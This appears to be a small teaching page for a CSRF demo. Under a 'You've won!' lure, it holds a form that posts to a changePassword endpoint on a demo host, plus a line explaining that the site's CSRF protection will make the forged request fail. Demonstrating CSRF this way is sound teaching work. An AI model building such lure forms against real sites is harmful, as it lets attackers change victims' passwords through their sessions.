<div class="container">  
  <div class="row">
    <div class="col-md-8">
      <div class="panel panel-default">
        <div class="panel-heading">
          <h3 class="panel-title">You've won!</h3>
        </div>
        <div class="panel-body">
          <form action="https://csrftokenon.herokuapp.com/user/changePassword" method="POST" name="loginForm" >
            <input type="submit" />
          </form>
        </div>
      </div>
    </div> <!-- class="row" -->
  </div>
  <div class="row">
    <div class="col-md-8">
      <p style="font-size: 21px; font-family: Helvetica Neue; font-weight: 200;">
        This is a CSRF attack where the form is circumventing the same-domain policy and hijaaking the existing session.  Since there is CSRF protection, the attack will fail and be forbidden.
      </p>
    </div>
  </div>
</div>
